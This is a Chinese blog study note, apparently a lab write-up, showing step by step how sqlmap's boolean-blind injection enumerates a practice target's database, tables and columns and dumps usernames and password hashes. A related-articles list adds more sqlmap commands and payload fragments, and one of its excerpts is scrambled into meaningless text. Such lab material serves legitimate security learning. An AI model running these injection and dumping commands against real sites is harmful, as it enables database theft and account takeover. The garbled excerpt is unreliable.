sqlmap注入(布尔盲注)

最新推荐文章于 2025-02-14 00:03:26 发布
原创 最新推荐文章于 2025-02-14 00:03:26 发布 · 8.7k 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #渗透 #sql注入 #sqlmap学习 #kali

本文通过实操演示了如何使用SQLMap自动化工具进行SQL注入攻击,详细步骤包括定位注入点、获取数据库名、爆破表名及列名,最终获取用户名与密码。

本人小白 仅仅作为学习笔记 希望通过一次次的记录可以一次次的成长 

sqlmap是一个自动化的sql注入工具,主要功能是扫描发现并利用注入漏洞

使用墨者学院的靶机进行测试  这里我们使用的是SQL注入漏洞测试(布尔盲注)

通过滚动条找到注入点

然后我们使用的是kali下的工具sqlmap 

 sqlmap -u http://219.153.49.228:46473/new_list.php?id=1

然后我们直接爆出数据库名字

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 --current -db

 爆出数据库名字为 stormgroup

然后报表名

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup --tables

爆出两个表  mumber notice

然后爆出表下的列名

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup  -T member --columns

这里爆出一个name 一个password 也就是我们需要的

然后我们爆出密码和用户名

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup  -T member -C name,password --dump

然后去百度md5解密可以得到第二个密码可以登录 

完成。

 

 

 

 

 

 

 

Z0安全
关注
SQL注入之路之二:布尔(boolean)盲注
weixin_62715196的博客
08-10 1802
简单描述什么是布尔型盲注以及对与布尔型盲注如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔注入的合理性
网安入门05-Sql注入布尔盲注&SqlMap
m0_61499194的博客
12-13 2574
常规:python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" --tables -D security
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注
07-06 3987
sqlmap-跑盲注靶场】
sqlmap 盲注使用
devil8123665的博客
04-17 7437
sql盲注 sqlmap.py -u "http://192.168.190.159/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vdc32duqf2vlc92tepq3fvfp70" --technique B --dbs --batch 通过上文...
sql注入-布尔盲注
WolvenSec的博客
06-02 3535
布尔盲注(Boolean Blind SQL Injection)是一种SQL注入攻击技术,用于在无法直接获得查询结果的情况下推断数据库信息;它通过发送不同的SQL查询来观察应用程序的响应,进而判断查询的真假,并逐步推断出有用的信息。接着我们以DVWA靶场中的为例子进行解释;可以看到该靶场只能显示数据库中是否存在该ID,并不会显示其他数据,那么此时我们就无法直接获得查询结果的情况下推断数据库信息,因此联合查询已经无法满足要求,那么我们就可以使用布尔盲注或其他的注入思想突破。
sqlmap使用布尔盲注的命令
04-18
在使用SQLMap进行布尔盲注时,可以使用以下命令: 1. 基本命令: ``` python sqlmap.py -u <目标URL> --data "数据>" --cookie "数据>" --level <注入等级> --risk <注入风险等级> ``` 其中,`<目标URL>`是要...
DVWA使用sqlmap进行布尔盲注
12-27
### 使用 SqlMap 对 DVWA 执行布尔盲注攻击的操作指南 #### 准备工作 为了成功利用 SqlMap 进行布尔盲注攻击,需先确保目标环境已设置好。DVWA (Damn Vulnerable Web Application) 是一个用于安全测试的应用程序,...
CTFHUB-SQL注入-布尔盲注
weixin_68416970的博客
06-12 1272
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
Sqlmap使用-盲注小实验
weixin_50339832的博客
06-03 7576
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 ...
SQL盲注(布尔盲注
Dug123456_的博客
04-07 3599
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
sqlmap布尔盲注怎么_SQL注入布尔盲注漏洞实战
weixin_33252222的博客
01-28 2589
实训目标1、掌握SQL注入原理;2、了解MySQL的数据结构;3、了解布尔盲注相关语句;解题方向1、通过布尔盲注得到后台账号,从而获得key。主界面:维护界面:经过测试,确定注入点在维护界面的URL链接的id参数中,但是没有报错回显,故而要通过盲注来进行判断。手工注入:利用布尔盲注,来进行爆库:首先是爆数据库名:payload1(布尔盲注):?id=1 orif(ascii(substr...
frpfile官方最新绕id工具_sqlmap工具使用详解
热门推荐
weixin_39764487的博客
11-26 1万+
大家好,我是 Taicker,鄙人有幸被 38.5 挑衅了,这其中发生了什么感人至深的故事,我就不说了。先来讲sqlmap工具1.sqlmap是什么sqlmap是一款自动化的 sql 注入工具,闻名程度匹敌几年前的啊 D,他的功能很多,比如判断是否可以注入,发现,然后利用漏洞,里面也包含了许多绕 waf 的脚本,不过近两年都绕不了了,在 18 年的时候还勉强可以绕过。他支持许多数据库:M...
SQL注入布尔盲注+时间盲注
最新发布
qq_44213575的博客
02-14 878
-os---poswn-pwn 参数在 参数 是sql sqlmapmap 提 中供是的一一个种强功能大的,用功能于,它通过允许 SQL攻击 注者入通过漏洞 SQL获取 注目标入系统漏洞的在操作目标系统数据库权限所在。--technique=THCH:指定使用的SQL注入技术,默认是"BEUSTQ",B是布尔盲注,E报错注入,U是联合查询。-v verbose,设置输出的详细程度,范围为0,6,默认为1,越高越多。--level=level:设置测试的级别,默认是1,范围1~5,越大越强。
布尔盲注sqlmap爆破
m0_52699073的博客
01-23 1600
布尔盲注sqlmap爆破 ————————————————————————————— 好久没有更新了,语句也忘的差不多了…。作为菜鸟的我也是终于弄懂了这道题,以及部分语句的意思。我将用尽可能详细且易理解的语言来表达。 sqlmap爆破(首先你得下载sqlmap,csdn中刚好有) 注入语句:python sqlmap.py -u"XXXXX" -batch是基本的注入框架。 一.爆破数据库的库名 输入:python sqlmap.py -u"http://challenge-cb6615ef28a95b3
【工具跑SQL盲注】
07-01 1586
【工具-SQL盲注】
SQL布尔盲注+时间盲注
m0_74848570的博客
02-13 1082
-os---poswn-pwn 参数在 参数 是sql sqlmapmap 提 中供是的一一个种强功能大的,用功能于,它通过允许 SQL攻击 注者入通过漏洞 SQL获取 注目标入系统漏洞的在操作目标系统数据库权限所在。的它服务器利用上数据库执行管理操作系统系统(命DBMS令)的漏洞执行恶,意甚至命获得令,反向通常 shell通过(数据库例如的:扩通过展 Net功能cat( 或如 Meter preterxp _cmdshell连接到 或攻击其他者系统的存机器储)。
SQL注入——布尔注入
Atkx's Blog
07-29 825
布尔注入 利用返回真假的效果做到 SQL 注入 如: String sql = null; sql = "select * from user where username = " + "'" + a + "'" + "and password = " + "'" + b + "'"; #a 和 b 都是 String 类型的变量,这是一个很明显的 SQL 注入漏洞。 String a = "admin' or 1 = 1 -- " String b = abc 最终发送到数据库的语句就是 select
SQL注入-布尔盲注
acepanhuan的博客
02-10 1961
学习SQL注入方法之盲注
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值